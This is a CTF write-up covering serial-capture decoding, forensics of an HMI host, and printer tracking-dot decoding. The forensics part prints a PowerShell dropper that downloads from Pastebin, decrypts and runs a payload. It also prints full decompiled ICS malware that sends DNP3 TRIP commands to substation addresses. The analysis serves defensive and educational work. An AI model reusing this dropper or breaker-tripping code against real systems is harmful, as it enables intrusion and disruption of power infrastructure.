CSAW CTF 2021 Writeups

Pretty fun challenges (those that I solved at least) :) I usually don’t even dare to touch anything ICS/SCADA related, but it turns out that these weren’t overly technical. We were also so close to solving the last Web challenge ‘scp-terminal’! We had all steps nailed down except the very last…

Details	Links
CTFtime.org Event Page	https://ctftime.org/event/1315

ICS

A Different Type of Serial Key

Attached are serial captures of two different uploads to an embedded device. One of these uploads is a key and the other is a function block. Your goal is to decode the serial traffic, extract the key and function block, and use these to find the flag. The flag will be in format flag{}.
Author: CISA
Attached: capture.sal, key.sal

To analyze serial captures, we can use Saleae Logic 2.

Extracting Function Block

capture.sal has 4 Channels.

4 Channels for 'capture.sal' in Saleae Logic 2

After reading other writeups online, I deduced this to be SPI communication where

Channel 0 is the Clock because it is at a constant frequency
Channel 1 is the Enable signal because it falls just before the Clock and Data start and rises just after they stop, with no other changes
Channel 2 is empty
Channel 3 is a Data signal because it has irregular transitions that occur only while the Channel 0 Clock is running and that align with the Clock’s edges

Since there is only one Data channel, it can be assigned to either MISO (Master In Slave Out) or MOSI (Master Out Slave In); it does not matter.
Knowing this, we can set up the SPI Analyzer with the correct Channels. In this case I chose MOSI for the single Data channel. The other settings can be left at their defaults because they happen to be correct for this situation.

SPI Analyzer configuration for 'capture.sal' in Saleae Logic 2
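
To make the role of each channel concrete, here is a minimal Python sketch of what an SPI decoder does with them. It assumes the analyzer defaults correspond to SPI mode 0 (sample on the rising Clock edge), most significant bit first, 8 bits per transfer and an active-low Enable. The functions decode_spi and encode_spi and the sample lists are made up for illustration and are not part of Saleae Logic 2.

```python
def decode_spi(clock, enable, data):
    """Sample `data` on each rising clock edge while `enable` is low (MSB first)."""
    out, bits = [], []
    prev_clk = clock[0]
    for clk, en, d in zip(clock[1:], enable[1:], data[1:]):
        if en == 0 and prev_clk == 0 and clk == 1:
            bits.append(d)
            if len(bits) == 8:
                value = 0
                for b in bits:
                    value = (value << 1) | b
                out.append(value)
                bits = []
        elif en == 1:
            bits = []  # frame ended, drop any partial byte
        prev_clk = clk
    return bytes(out)


def encode_spi(payload):
    """Build toy clock/enable/data sample lists for `payload` (test helper only)."""
    clock, enable, data = [0], [1], [0]  # idle state: Enable high
    for byte in payload:
        for shift in range(7, -1, -1):
            bit = (byte >> shift) & 1
            clock += [0, 1]   # one full clock cycle per bit
            enable += [0, 0]  # Enable held low during the transfer
            data += [bit, bit]
    clock.append(0)
    enable.append(1)
    data.append(0)
    return clock, enable, data


decoded = decode_spi(*encode_spi(b"S0"))
print(decoded)
```

With a single Data line the decoder is identical whether that line is labelled MOSI or MISO, which is why the choice does not matter here.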

If we then turn on ASCII display for our SPI Analyzer and zoom out, we get a very nice looking string with no errors! The extracted ASCII characters are also shown in a table on the right, under the ‘Data’ section.

Turning on ASCII output for SPI Analyzer in Saleae Logic 2

We can turn off all columns except mosi since that’s where our ASCII data is contained, and then do an Export Table either to CSV or to clipboard.

Exporting Table Data for SPI Analyzer in Saleae Logic 2

Clean up the data by removing the table headers and replacing instances of \n with actual newline characters and you should get something like this!

S00C00004C6F63616C204B6579BF
S221020018423B165105BDAAFF27DB3B5D223497EA549FDC4D27330808F7F95D95B0EC
S5030001FB
S0210000506F77657250432042696720456E6469616E2033322D42697420537475620E
S12304EC9421FFD093E1002C7C3F0B78907F000C909F000839200000913F001C4800012C7E
S123050C813F001C552907FE2F890000409E0058813F001C815F000C7D2A4A1489290000FF
S123052C7D2A07743D20100281090018813F001C7D284A14892900003929FFFD5529063EC7
S123054C7D2907747D494A787D280774813F001C815F00087D2A4A14550A063E9949000074
S123056C480000BC815F001C3D205555612955567D0A48967D49FE707D2940501D29000317
S123058C7D2950502F890000409E0058813F001C815F000C7D2A4A14892900007D2A077476
S12305AC3D20100281090018813F001C7D284A1489290000392900055529063E7D2907743F
S12305CC7D494A787D280774813F001C815F00087D2A4A14550A063E99490000480000408D
S12305EC813F001C815F000C7D2A4A14890900003D20100281490018813F001C7D2A4A145A
S123060C89490000813F001C80FF00087D274A147D0A5278554A063E99490000813F001CA1
S123062C39290001913F001C813F001C2F89001C409DFED0813F00083929001D3940000040
S11B064C9949000060000000397F003083EBFFFC7D615B784E80002060
S503000CF0

If we throw it into IDA Pro, we see that this is actually a Motorola S-record.

I wanted to know what processor the binary executable code in the S-record was for, so I googled the first few bytes and multiple results pointed to PowerPC as the answer.

Google result identifying same machine code as belonging to the PowerPC processor
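
As a cross-check that needs no search engine, the S0 header records in the dump carry readable text. The sketch below is a minimal S-record parser written for this writeup (parse_srecord is my own helper name, not something from IDA or Saleae); it verifies each record's checksum and decodes the two header records as ASCII.

```python
def parse_srecord(line):
    """Split one S-record into (type, address, data) and verify its checksum."""
    rec_type = line[:2]
    raw = bytes.fromhex(line[2:])
    count, body, checksum = raw[0], raw[1:-1], raw[-1]
    if count != len(raw) - 1:
        raise ValueError("byte count mismatch")
    # Checksum: ones' complement of the low byte of the sum of count, address and data
    if (~(count + sum(body))) & 0xFF != checksum:
        raise ValueError("checksum mismatch")
    addr_len = {"S0": 2, "S1": 2, "S2": 3, "S3": 4, "S5": 2}[rec_type]
    address = int.from_bytes(body[:addr_len], "big")
    return rec_type, address, body[addr_len:]


# The two S0 (header) records from the exported capture
headers = [
    "S00C00004C6F63616C204B6579BF",
    "S0210000506F77657250432042696720456E6469616E2033322D42697420537475620E",
]
header_texts = [parse_srecord(h)[2].decode("ascii") for h in headers]
for text in header_texts:
    print(text)
```

The headers decode to "Local Key" and "PowerPC Big Endian 32-Bit Stub", which agrees with the PowerPC result from the search.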

We can now reload the file into IDA and select ‘PowerPC big-endian’ as the processor type! There’ll be a few prompts following that, but no worries. Select ppc as the device name, cancel the dialog box for Loaded information type, and pick 32-bit ISA for the instruction set architecture.

Selecting PowerPC big-endian processor type in IDA Pro

Create a function at the start of the disassembled code with ‘P’, and then we can decompile it nicely with ‘F5’.

Creating function at start of disassembly in IDA Pro

Decompiled function block shows XOR routine in IDA Pro

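The function block sub_4EC loops through 29 bytes stored at 0x10020018, adjusts each byte according to its index (subtracting 3 at even indices and adding 5 at odd indices that are multiples of 3), XORs it with the corresponding byte of the argument key, and then stores the output in result. We just need to know the key and then we can calculate our own result which is probably the flag or something!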

Replicating the decryption pseudocode routine in Python, it looks like this:

# bytes present from memory location
stuff = [
  0x42, 0x3B, 0x16, 0x51, 0x05, 0xBD, 0xAA, 0xFF, 0x27, 0xDB, 
  0x3B, 0x5D, 0x22, 0x34, 0x97, 0xEA, 0x54, 0x9F, 0xDC, 0x4D, 
  0x27, 0x33, 0x08, 0x08, 0xF7, 0xF9, 0x5D, 0x95, 0xB0
]

key = [
  # unknown
]

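# 29 output bytes plus the NUL terminator that the function writes at the end
result = [0] * 30

for i in range(29):
    if (i & 1) != 0:
        if i % 3:
            # odd index that is not a multiple of 3: plain XOR
            byte = key[i] ^ stuff[i]
        else:
            # odd multiple of 3: add 5 (kept to 8 bits) before the XOR
            byte = key[i] ^ ((stuff[i] + 5) & 0xFF)
        result[i] = byte
    else:
        # even index: subtract 3 (kept to 8 bits) before the XOR
        result[i] = key[i] ^ ((stuff[i] - 3) & 0xFF)

# print the 29 decoded bytes (without the trailing NUL), which is probably the flag
print("".join([chr(x) for x in result[:29]]))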

Extracting Key

key.sal has 2 visible Channels.

2 visible Channels for 'key.sal' in Saleae Logic 2

Similarly, with the help of online writeups, I reasoned that this could be I2C communication where

Channel 0 is the Clock (SCL) because it has a consistent pulse
Channel 1 is the Data (SDA) because it occurs irregularly within the intervals of the Clock signals

So just set up the I2C Analyzer with the correct channels,

I2C Analyzer configuration for 'key.sal' in Saleae Logic 2

and we will get a nice 29 bytes of Hex data parsed from the serial traffic. We can also see that these bytes are being read from address 0x08.

Hex data for I2C communication in 'key.sal' in Saleae Logic 2

Extract the bytes the same way as we did for the function block by turning off irrelevant columns and exporting the table, and the result cleaned up is essentially the key that we need for our function block!

key = [
    0x59, 0x57, 0x72, 0x31, 0x79, 0xCE, 0x94, 0x8D, 0x15, 0xD4,
    0x54, 0x02, 0x7C, 0x5C, 0xA0, 0x83, 0x3D, 0xAC, 0xB7, 0x2A,
    0x17, 0x67, 0x76, 0x38, 0x98, 0x8F, 0x69, 0xE8, 0xD0
]

Final Decryption Script

# bytes present from memory location
stuff = [
  0x42, 0x3B, 0x16, 0x51, 0x05, 0xBD, 0xAA, 0xFF, 0x27, 0xDB, 
  0x3B, 0x5D, 0x22, 0x34, 0x97, 0xEA, 0x54, 0x9F, 0xDC, 0x4D, 
  0x27, 0x33, 0x08, 0x08, 0xF7, 0xF9, 0x5D, 0x95, 0xB0
]

key = [
    0x59, 0x57, 0x72, 0x31, 0x79, 0xCE, 0x94, 0x8D, 0x15, 0xD4,
    0x54, 0x02, 0x7C, 0x5C, 0xA0, 0x83, 0x3D, 0xAC, 0xB7, 0x2A,
    0x17, 0x67, 0x76, 0x38, 0x98, 0x8F, 0x69, 0xE8, 0xD0
]

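# 29 output bytes plus the NUL terminator that the function writes at the end
result = [0] * 30

for i in range(29):
    if (i & 1) != 0:
        if i % 3:
            # odd index that is not a multiple of 3: plain XOR
            byte = key[i] ^ stuff[i]
        else:
            # odd multiple of 3: add 5 (kept to 8 bits) before the XOR
            byte = key[i] ^ ((stuff[i] + 5) & 0xFF)
        result[i] = byte
    else:
        # even index: subtract 3 (kept to 8 bits) before the XOR
        result[i] = key[i] ^ ((stuff[i] - 3) & 0xFF)

# print the 29 decoded bytes (without the trailing NUL), which is the flag
print("".join([chr(x) for x in result[:29]]))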

Flag: flag{s3r14l_ch4ll3ng3_s0lv3r}

Tripping Breakers

Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account. There is a scheduled task that executed in April 2021 that tripped various breakers by sending DNP3 messages. We would like your help clarifying some information. What was the IP address of the substation_c, and how many total breakers were tripped by this scheduled task? Flag format: flag{IP-Address:# of breakers}. For example if substation_c’s IP address was 192.168.1.2 and there were 45 total breakers tripped, the flag would be flag{192.168.1.2:45}.

Author: CISA
Attached: hmi_host_data.zip

In the .zip file,

host\scheduled_tasks.csv contains scheduled tasks
host\Registry\SOFTWARE_ROOT.json contains registry hives
host\operator contains the User-Profile folder of a Windows account

Powershell Scheduled Task

I first opened up scheduled_tasks.csv, sorted by Last Run Time and focused on tasks that were run in April 2021 (i.e. 4/1/2021).

Powershell script execution in Scheduled Tasks CSV

In the sea of various system binaries, a Powershell entry stood out: wcr_flail.ps1 was run with -ExecutionPolicy Bypass. Suspicious. Since it resided in the %temp% directory, we can retrieve it from the operator User-Profile folder, specifically under operator\AppData\Local\Temp.

After formatting the script nicely with newlines, this is what it looks like:

$SCOP = ((new-object System.Net.WebClient).DownloadString("https://pastebin.com/raw/rBXHdE85")).Replace("!","f").Replace("@","q").Replace("#","z").Replace("<","B").Replace("%","K").Replace("^","O").Replace("&","T").Replace("*","Y").Replace("[","4").Replace("]","9").Replace("{","=");
$SLPH = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($SCOP));
$E=(Get-ItemProperty -Path $SLPH -Name Blast)."Blast";
$TWR =  "!M[[pcU09%d^kV&l#9*0XFd]cVG93<".Replace("!","SEt").Replace("@","q").Replace("#","jcm").Replace("<","ZXI=").Replace("%","GVF").Replace("^","BU").Replace("&","cTW").Replace("*","zb2Z").Replace("[","T").Replace("]","iZW1").Replace("{","Fdi");
$BRN = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($TWR));
$D= (Get-ItemProperty -Path $BRN -Name Off)."Off";
openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass:$E -out "c:\1\fate.exe";
C:\1\fate.exe;

Decoding Second-Stage Payload

A payload is retrieved from Pastebin, deobfuscated, Base64-decoded and then used as a Path to read an Item Property from.
We can debug the Powershell script in Windows Powershell ISE and evaluate expressions at runtime to find out which Path the $SLPH variable contains.

[DBG]: PS C:\Users\[redacted]>> $SLPH
HKLM:\SOFTWARE\Microsoft\Windows\TabletPC\Bell

It’s a registry path! Good thing we have the registry hives JSON file then. I opened up SOFTWARE_ROOT.json in EmEditor since it’s a large file and used the TidyJSON Macro to format the JSON nicely.
Since the Powershell script tries to get the Data associated with Value Name Blast at Key HKLM\SOFTWARE\Microsoft\Windows\TabletPC\Bell, I searched for Blast and retrieved the Data as M4RK_MY_W0Rd5.

Searching for Blast in the registry hive JSON file

Repeating this same process with the $BRN Path decoded from $TWR, we get \\EOTW\\151.txt stored at Value Name Off at HKLM\SOFTWARE\Microsoft\Wbem\Tower.

Searching for Tower in the registry hive JSON file
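
The $TWR string is embedded in the script itself, so its Path can also be recovered offline without running any Powershell. The sketch below is a Python re-implementation of the same Replace chain followed by the Base64 decode; the helper name deobfuscate is my own, while the string and the replacement pairs are copied from the script.

```python
import base64

# Obfuscated string and replacement pairs copied from the $TWR line of wcr_flail.ps1
twr = "!M[[pcU09%d^kV&l#9*0XFd]cVG93<"
replacements = [
    ("!", "SEt"), ("@", "q"), ("#", "jcm"), ("<", "ZXI="), ("%", "GVF"),
    ("^", "BU"), ("&", "cTW"), ("*", "zb2Z"), ("[", "T"), ("]", "iZW1"),
    ("{", "Fdi"),
]


def deobfuscate(text, table):
    """Apply the substitutions in order, then Base64-decode the result as UTF-8."""
    for old, new in table:
        text = text.replace(old, new)
    return base64.b64decode(text).decode("utf-8")


brn = deobfuscate(twr, replacements)
print(brn)
```

This prints HKLM:\SOFTWARE\Microsoft\Wbem\Tower, the same Path used for the registry lookup above. The $SCOP string cannot be handled this way without first fetching the Pastebin content.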

The Powershell script is then essentially simplified to this:

$E = "M4RK_MY_W0Rd5"
$D = "\\EOTW\\151.txt"
openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass:$E -out "c:\1\fate.exe";
C:\1\fate.exe;

Referencing the manual page for openssl, we can understand that the passphrase M4RK_MY_W0Rd5 is run through a SHA256-based key derivation (together with the salt stored in the file) to generate the AES-256-CBC key, which is then used to decrypt the Base64-encoded data in %temp%\EOTW\151.txt. The decrypted data is then executed.
Since 151.txt is in the %temp% folder, we can retrieve it from the operator User-Profile folder as well. After that, we can replicate the decryption easily to get the second-stage payload fate.exe (just make sure you have openssl):

cat 151.txt | openssl aes-256-cbc -a -A -d -salt -md sha256 -pass pass:"M4RK_MY_W0Rd5" -out fate.exe
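
For the curious, here is a rough Python sketch of how the key and IV come out of the passphrase. It assumes the command relies on openssl's legacy password-based derivation (no -pbkdf2 flag), which as far as I know is EVP_BytesToKey with a single iteration of the chosen digest, and that the decoded file starts with the usual Salted__ header. The helper names and the placeholder blob are made up for illustration; the AES step itself is still left to openssl.

```python
import hashlib


def evp_bytes_to_key(password, salt, key_len=32, iv_len=16):
    """Derive (key, iv) by chaining SHA-256 over previous block + password + salt."""
    derived = b""
    block = b""
    while len(derived) < key_len + iv_len:
        block = hashlib.sha256(block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


def split_salted(blob):
    """Split a decoded 'Salted__' blob into (salt, ciphertext)."""
    if blob[:8] != b"Salted__":
        raise ValueError("missing Salted__ header")
    return blob[8:16], blob[16:]


# Placeholder standing in for the Base64-decoded contents of 151.txt (not real data)
example_blob = b"Salted__" + bytes(range(8)) + b"\x00" * 16
salt, ciphertext = split_salted(example_blob)
key, iv = evp_bytes_to_key(b"M4RK_MY_W0Rd5", salt)
print(len(key), len(iv))
```

Because SHA-256 outputs 32 bytes, the first digest alone forms the AES-256 key and the first half of the second digest becomes the IV.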

Decompiling to Python

The decrypted fate.exe has a PyInstaller file icon and is also detected as a PyInstaller executable by Exeinfo PE.

Exeinfo PE detecting fate.exe as PyInstaller 3.6

Thus, we can use PyInstaller Extractor to extract the Python files contained within the .exe.
However, do note that it is important to run the extractor with the same Python version that was used to build the executable. But how would we know which version that was? PyInstaller Extractor will tell you in the first few lines of its output even if you run it with the wrong Python version:

D:\Downloads\CSAW\hmi_host_data>"D:\Data\Python36\python.exe" pyinstextractor.py fate.exe
[+] Processing fate.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 36
...

In this case since the Python version detected in fate.exe is 36, I installed Python 3.6.8 and reran the extractor script.

D:\Downloads\CSAW\hmi_host_data>"D:\Data\Python36\python.exe" pyinstextractor.py fate.exe
[+] Processing fate.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 36
[+] Length of package: 5716392 bytes
[+] Found 59 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: trip_breakers.pyc
[+] Found 133 files in PYZ archive
[+] Successfully extracted pyinstaller archive: fate.exe

You can now use a python decompiler on the pyc files within the extracted directory

trip_breakers.pyc sounds like what we want! But because it is still in compiled bytecode format (.pyc), we will use uncompyle6 to decompile it back into normal Python source code.

D:\Downloads\CSAW\hmi_host_data\fate.exe_extracted>uncompyle6 trip_breakers.pyc
# uncompyle6 version 3.7.5.dev0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.6.8 (tags/v3.6.8:3c6b436a57, Dec 24 2018, 00:16:47) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: trip_breakers.py
[... source code shifted below ...]
# okay decompiling trip_breakers.pyc

Source Code Analysis

I moved the source code out of the output above to here:

import struct, socket, time, sys
from crccheck.crc import Crc16Dnp
OPT_1 = 3
OPT_2 = 4
OPT_3 = 66
OPT_4 = 129

class Substation:

    def __init__(self, ip_address, devices):
        self.target = ip_address
        self.devices = []
        self.src = 50
        self.transport_seq = 0
        self.app_seq = 10
        for device in devices:
            self.add_device(device)

        self.connect()

    def connect(self):
        print('Connecting to {}...'.format(self.target))
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.target, 20000))
        print('Connected to {}'.format(self.target))

    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})

    def activate_all_breakers(self, code):
        for device in self.devices:
            dnp3_header = self.get_dnp3_header(device['dst'])
            for x in range(1, device['count'] * 2, 2):
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_1, code)
                self.socket.send(dnp3_packet)
                time.sleep(2)
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_2, code)
                self.socket.send(dnp3_packet)
                time.sleep(5)

    def get_dnp3_header(self, dst):
        data = struct.pack('<H2B2H', 25605, 24, 196, dst, self.src)
        data += struct.pack('<H', Crc16Dnp.calc(data))
        return data

    def get_dnp3_data(self, index, function, code):
        data = struct.pack('<10BIH', 192 + self.transport_seq, 192 + self.app_seq, function, 12, 1, 23, 1, index, code, 1, 500, 0)
        data += struct.pack('<H', Crc16Dnp.calc(data))
        data += struct.pack('<HBH', 0, 0, 65535)
        self.transport_seq += 1
        self.app_seq += 1
        if self.transport_seq >= 62:
            self.transport_seq = 0
        if self.app_seq >= 62:
            self.app_seq = 0
        return data


def main():
    if socket.gethostname() != 'hmi':
        sys.exit(1)
    substation_a = Substation('10.95.101.80', [(2, 4), (19, 8)])
    substation_b = Substation('10.95.101.81', [(9, 5), (8, 7), (20, 12), (15, 19)])
    substation_c = Substation('10.95.101.82', [(14, 14), (9, 16), (15, 4), (12, 5)])
    substation_d = Substation('10.95.101.83', [(20, 17), (16, 8), (8, 14)])
    substation_e = Substation('10.95.101.84', [(12, 4), (13, 5), (4, 2), (11, 9)])
    substation_f = Substation('10.95.101.85', [(1, 4), (3, 9)])
    substation_g = Substation('10.95.101.86', [(10, 14), (20, 7), (27, 4)])
    substation_h = Substation('10.95.101.87', [(4, 1), (10, 9), (13, 6), (5, 21)])
    substation_i = Substation('10.95.101.88', [(14, 13), (19, 2), (8, 6), (17, 8)])
    substation_a.activate_all_breakers(OPT_3)
    substation_b.activate_all_breakers(OPT_4)
    substation_c.activate_all_breakers(OPT_4)
    substation_d.activate_all_breakers(OPT_4)
    substation_e.activate_all_breakers(OPT_3)
    substation_f.activate_all_breakers(OPT_4)
    substation_g.activate_all_breakers(OPT_3)
    substation_h.activate_all_breakers(OPT_4)
    substation_i.activate_all_breakers(OPT_4)


if __name__ == '__main__':
    main()

To find substation_c’s IP address, we just need to look at main(), where the substation_c Substation object is instantiated with an IP address of 10.95.101.82.
To find the total number of breakers tripped, we first need to understand what the DNP3 TRIP Control Code is.
In this user manual https://download.schneider-electric.com/files?p_Doc_Ref=SEPED305001EN, the Control Code is described as 8 bits of data with bits 7 and 6 being 10 for a TRIP code. With the Q and Cl bits being 0 for normal operation, and the Code being 0001 = 1 for Pulse On, the TRIP Control Code would then be 1000 0001 = 129, which matches OPT_4 in the Python code (initialised near the top of the script)!

DNP3 Control Code format specification from a Schneider Electric User Manual

Another manual online also corroborated my findings that the TRIP Control Code is OPT_4 = 129 (0x81).

DNP3 Control Code format specification from a Software toolbox User Manual
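
The bit arithmetic can be double-checked with a few lines of Python. This is only a sketch: the function names are mine, and the positions of the Q and Cl bits (bit 4 and bit 5) are an assumption based on my reading of the format; since both are 0 here, they do not affect the result.

```python
def pack_control_code(tcc, clear, queue, code):
    """Pack the fields into one byte: TCC in bits 7-6, Cl in bit 5, Q in bit 4, Code in bits 3-0."""
    return (tcc << 6) | (clear << 5) | (queue << 4) | code


def unpack_control_code(value):
    """Split a control code byte back into its fields."""
    return {
        "tcc": value >> 6,
        "clear": (value >> 5) & 1,
        "queue": (value >> 4) & 1,
        "code": value & 0x0F,
    }


# TRIP (bits 7-6 = 10) with Pulse On (Code = 0001) and Q = Cl = 0
trip = pack_control_code(tcc=0b10, clear=0, queue=0, code=0b0001)
print(trip, hex(trip))

# OPT_3 = 66 from the decompiled script, for comparison
print(unpack_control_code(66))
```

The first line prints 129 0x81, matching OPT_4. Unpacking OPT_3 = 66 gives bits 7 and 6 as 01, which is not the TRIP pattern, so only the OPT_4 calls count.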

Going back to the code, we see that OPT_4 is sent to Substations B, C, D, F, H, I, through the activate_all_breakers function.

substation_a.activate_all_breakers(OPT_3)
substation_b.activate_all_breakers(OPT_4)
substation_c.activate_all_breakers(OPT_4)
substation_d.activate_all_breakers(OPT_4)
substation_e.activate_all_breakers(OPT_3)
substation_f.activate_all_breakers(OPT_4)
substation_g.activate_all_breakers(OPT_3)
substation_h.activate_all_breakers(OPT_4)
substation_i.activate_all_breakers(OPT_4)

At first glance, activate_all_breakers appears to loop through each device in each substation (the outer for loop), and send the TRIP Control Code OPT_4 to each device as many times as specified by device['count'] (the inner for loop).

    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})

    def activate_all_breakers(self, code):
        for device in self.devices:
            dnp3_header = self.get_dnp3_header(device['dst'])
            for x in range(1, device['count'] * 2, 2):
                ...
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_2, code)
                self.socket.send(dnp3_packet)
                ...

    def get_dnp3_header(self, dst):
        data = struct.pack('<H2B2H', 25605, 24, 196, dst, self.src)
        ...

    def get_dnp3_data(self, index, function, code):
        data = struct.pack('<10BIH', 192 + self.transport_seq, 192 + self.app_seq, function, 12, 1, 23, 1, index, code, 1, 500, 0)
        ...

However, looking at this paper https://arxiv.org/pdf/2102.11455.pdf made me realize that device['count'] actually represents the number of different devices. While device['dst'] determines the dst used by get_dnp3_header, device['count'] determines the range of index values passed to get_dnp3_data. And this index actually identifies unique devices!

Explanation of DNP3 communication in a research paper
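
A quick way to see this is to list the index values that the inner loop generates for a given count. The helper breaker_indices below is my own name for illustration; the range expression is the one from activate_all_breakers.

```python
def breaker_indices(count):
    """Index values that the inner loop passes to get_dnp3_data for one device entry."""
    return list(range(1, count * 2, 2))


print(breaker_indices(4))

# Device entries of substation_c, copied from main()
substation_c_devices = [(14, 14), (9, 16), (15, 4), (12, 5)]
print(sum(len(breaker_indices(count)) for _, count in substation_c_devices))
```

A count of 4 yields the four distinct indices 1, 3, 5 and 7, so each entry addresses exactly count different breakers, and substation_c alone accounts for 39 of them.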

Thus, to calculate the number of breakers tripped, i.e. the number of devices that the TRIP Control Code was sent to, we add up all the values of device['count'] for Substations B, C, D, F, H, I.
Modifying the decompiled Python script:

class Substation:

    def __init__(self, ip_address, devices):
        self.devices = []
        for device in devices:
            self.add_device(device)

    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})
    
    def __len__(self):
        total = 0
        for device in self.devices:
            total += device['count']
        return total


def main():
    substation_b = Substation('10.95.101.81', [(9, 5), (8, 7), (20, 12), (15, 19)])
    substation_c = Substation('10.95.101.82', [(14, 14), (9, 16), (15, 4), (12, 5)])
    substation_d = Substation('10.95.101.83', [(20, 17), (16, 8), (8, 14)])

    substation_f = Substation('10.95.101.85', [(1, 4), (3, 9)])

    substation_h = Substation('10.95.101.87', [(4, 1), (10, 9), (13, 6), (5, 21)])
    substation_i = Substation('10.95.101.88', [(14, 13), (19, 2), (8, 6), (17, 8)])

    substations = (substation_b, substation_c, substation_d, substation_f, substation_h, substation_i)
    
    print("Total Breakers: {}".format(sum(len(s) for s in substations)))

if __name__ == '__main__':
    main()

D:\Downloads\CSAW>get_breakers_count.py
Total Breakers: 200

Flag: flag{10.95.101.82:200}

Forensics

mic

My Epson InkJet printer is mysteriously printing blank pages. Is it trying to tell me something?

Attached: scan.pdf

scan.pdf looks like 34 blank pages, but if you zoom in a good bit you’ll notice that the pages are covered with numerous yellow dots. This is actually Machine Identification Code (MIC), which explains the challenge’s title.

To decode these dots, the common solution is to first use pdftoppm to convert the PDF pages into image files, then use deda_parse_print from deda to parse the image files for the identification information contained within. So if we do that and just test out deda_parse_print on the first PDF page, we get the following output:

_|0|1|2|3|4|5|6|7
0|
1|.
2|.
3|.
4|              .
5|            .
6|.
7|.
8|.         . .
9|        .   . .
0|.       .     .
1|        .
2|.           . .
3|.
4|.
5|  . . .     . .
        27 dots.



<TDM of Pattern 4 at 0.32 x 0.64 inches>
Decoded:
        manufacturer: Epson
        serial: -000102-
        timestamp: 2006-11-09 08:00:00
        raw: 0000000102000006110908030000
        minutes: 00
        hour: 08
        day: 09
        month: 11
        year: 06
        unknown1: 00
        unknown3: 00
        unknown4: 00
        unknown5: 00
        printer: 00000102

The value in serial and printer looks like an ASCII character code. In particular, the value for this first page represents f and could be the first character of the flag. So all we need to do is probably just run deda_parse_print on all the PDF pages and extract either the serial or printer value from the output.
However, I wanted a solution that did not require external tools and could run the entire process from a single Python script. This led me to use PyMuPDF for the PDF-to-image conversion, and libdeda from deda instead of the binaries.
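
The character lookup itself is a one-liner. In this small sketch the helper name mic_char is made up; the two input strings are the printer and serial values from the output above.

```python
def mic_char(field):
    """Read the decimal digits of a decoded field as an ASCII character code."""
    return chr(int(field.strip("-")))


print(mic_char("00000102"))  # printer field of the first page
print(mic_char("-000102-"))  # serial field of the first page
```

Both fields give f for the first page, so either one can be used to build the flag.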

PyMuPDF is imported as fitz and is used to read the PDF and configure the DPI of the saved image using a Matrix. It is then also important to pass this same DPI value to libdeda’s PrintParser, otherwise it will make an incorrect assumption about the image’s DPI and fail to detect the tracking dots. In my script below, I retrieved the value from printer to form the flag string.

import fitz
from libdeda.print_parser import *

fname = "scan.pdf"
doc = fitz.open(fname)
dpi = 500
zoom = dpi / 72
mat = fitz.Matrix(zoom, zoom)

flag = ""

for page in doc:
    pix = page.get_pixmap(matrix=mat)
    pix.save("scan_{}.png".format(page.number))
    
    pp = PrintParser("scan_{}.png".format(page.number), dict(inputDpi=dpi))

    # just for show
    print(pp.tdm)

    decoded = pp.tdm.decode()

    printer = chr(int(decoded["printer"]))
    flag += printer

    # just for show
    for key in ["manufacturer", "serial", "timestamp", "raw"]+list(decoded.keys()):
        if key not in decoded: continue
        print("\t%s: %s"%(key, decoded.pop(key)))            

print(flag)

Flag: flag{watchoutforthepoisonedcoffee}

Thanks for stopping by :)